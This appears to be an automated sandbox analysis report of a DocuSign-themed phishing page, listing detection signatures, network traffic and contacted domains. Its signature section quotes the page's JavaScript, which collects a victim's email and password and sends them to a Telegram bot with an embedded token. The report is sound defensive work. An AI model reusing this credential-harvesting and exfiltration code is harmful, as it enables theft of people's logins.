Windows Analysis Report
http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html

Overview

General Information

Sample URL: http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html
Analysis ID: 1521710
Tags: openphish
Infos:

Detection

HTMLPhisher
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected HtmlPhish10
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Phishing site detected (based on favicon image match)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Submit button contains javascript call

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Multi AV Scanner detection for domain / URL
Source: pub-7c9ee239002440a79f4b2c5934b13627.r2.dev Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for submitted file
Source: http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html Virustotal: Detection: 14% Perma Link

Phishing
barindex
AI detected phishing page
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html LLM: Score: 7 Reasons: The brand 'PDF ENCRYPT, Inc.' is not widely recognized and falls under 'unknown'., The URL 'pub-7c9ee239002440a79f4b2c5934b13627.r2.dev' does not match the expected domain for 'PDF ENCRYPT, Inc.'., The URL contains a long string of characters which is unusual for legitimate domains., The domain extension '.dev' is not commonly used for commercial services and can be suspicious., The presence of input fields for 'Password' and 'Enter password' without a clear context or secure domain raises suspicion. DOM: 0.0.pages.csv
Yara detected HtmlPhish10
Source: Yara match File source: 0.0.pages.csv, type: HTML
Source: Yara match File source: dropped/chromecache_52, type: DROPPED
Javascript uses Clearbit API to dynamically determine company logos
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html HTTP Parser: function z() { var email = window.location.hash.substr(1); //change window.location.hash.substr(1) to "xxxemail" if you are using attachment.// example // var email = "xxxemail";var ind=email.indexof("@"); var my_slice=email.substr((ind+1));var my_slice2=email.substr(ind+1,email.length);document.getelementbyid('username').value = email;document.getelementbyid('logoname').innerhtml = email;$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);}
Javascript uses Telegram API
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html HTTP Parser: function sendemail() {var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!filter.test(document.getelementbyid('username').value)) {alert('invalid email'); return false; } if (document.getelementbyid('password').value === '') { alert('please enter a valid password!'); return false; }var x = document.getelementbyid("div4"); var a = document.getelementbyid("div1"); var b = document.getelementbyid("div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getelementbyid('username').value;var password = document.getelementbyid('password').value;var ozi = "\n=========docusignboy======\n" ozi+="email :"+username ozi+="\npass :" +password ozi+="\n============================\n" tmsend(ozi)}function tmsend(message){ var token = "njgyndg2ntqzndpbquzdnznjthjay1bgwwndm3rtstfkby1jt2g3rzlncfvoutc=="; var chat_id= ...
Phishing site detected (based on favicon image match)
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html Matcher: Template: docusign matched with high similarity
HTML body contains low number of good links
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html HTTP Parser: Number of links: 0
HTML body contains password input but no form action
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html HTTP Parser: <input type="password" .../> found but no <form action="...
HTML title does not match URL
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html HTTP Parser: Title: View Secure Document - Sign in does not match URL
Submit button contains javascript call
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html HTTP Parser: On click: sendEmail()
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html HTTP Parser: <input type="password" .../> found
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html HTTP Parser: No <meta name="author".. found
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.4:50296 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.4:64382 -> 1.1.1.1:53
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /higher.html HTTP/1.1Host: pub-7c9ee239002440a79f4b2c5934b13627.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.png HTTP/1.1Host: cdn4.iconfinder.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /C8yD9g5/US-payment-terms-1.jpg HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.png HTTP/1.1Host: cdn4.iconfinder.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /C8yD9g5/US-payment-terms-1.jpg HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /higher.html HTTP/1.1Host: pub-7c9ee239002440a79f4b2c5934b13627.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic DNS traffic detected: DNS query: pub-7c9ee239002440a79f4b2c5934b13627.r2.dev
Source: global traffic DNS traffic detected: DNS query: cdn4.iconfinder.com
Source: global traffic DNS traffic detected: DNS query: i.ibb.co
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: logo.clearbit.com
Source: chromecache_52.2.dr String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: chromecache_52.2.dr String found in binary or memory: https://api.telegram.org/bot$
Source: chromecache_52.2.dr String found in binary or memory: https://cdn4.iconfinder.com/data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.pn
Source: chromecache_52.2.dr String found in binary or memory: https://i.ibb.co/C8yD9g5/US-payment-terms-1.jpg
Source: chromecache_52.2.dr String found in binary or memory: https://logo.clearbit.com/
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 64388 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64388
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: classification engine Classification label: mal92.phis.win@17/13@18/10
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2224,i,13459048935770078743,2555675960266731751,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2224,i,13459048935770078743,2555675960266731751,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1521710 URL: http://pub-7c9ee239002440a7... Startdate: 29/09/2024 Architecture: WINDOWS Score: 92 26 Multi AV Scanner detection for domain / URL 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 5 other signatures 2->32 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49723 unknown unknown 6->14 16 192.168.2.6 unknown unknown 6->16 18 239.255.255.250 unknown Reserved 6->18 11 chrome.exe 6->11         started        process5 dnsIp6 20 pub-7c9ee239002440a79f4b2c5934b13627.r2.dev 162.159.140.237, 443, 49735, 49736 CLOUDFLARENETUS United States 11->20 22 logo.clearbit.com 11->22 24 6 other IPs or domains 11->24
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.184.196
 www.google.com United States
15169 GOOGLEUS false
142.250.186.36
 unknown United States
15169 GOOGLEUS false
162.159.140.237
 pub-7c9ee239002440a79f4b2c5934b13627.r2.dev United States
13335 CLOUDFLARENETUS true
13.32.27.77
 d26p066pn2w0s0.cloudfront.net United States
7018 ATT-INTERNET4US false
162.19.58.157
 i.ibb.co United States
209 CENTURYLINK-US-LEGACY-QWESTUS false
172.66.41.45
 cdn4.iconfinder.com United States
13335 CLOUDFLARENETUS false
162.19.58.159
 unknown United States
209 CENTURYLINK-US-LEGACY-QWESTUS false
239.255.255.250
 unknown Reserved
unknown unknown false

Private

IP
192.168.2.4
192.168.2.6

Contacted Domains

Name IP Active
d26p066pn2w0s0.cloudfront.net 13.32.27.77 true
www.google.com 142.250.184.196 true
cdn4.iconfinder.com 172.66.41.45 true
pub-7c9ee239002440a79f4b2c5934b13627.r2.dev 162.159.140.237 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true
i.ibb.co 162.19.58.157 true
logo.clearbit.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://i.ibb.co/C8yD9g5/US-payment-terms-1.jpg false unknown
http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html true
    		unknown
    https://cdn4.iconfinder.com/data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.png false unknown
    https://logo.clearbit.com/ true unknown
    https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html true
      		unknown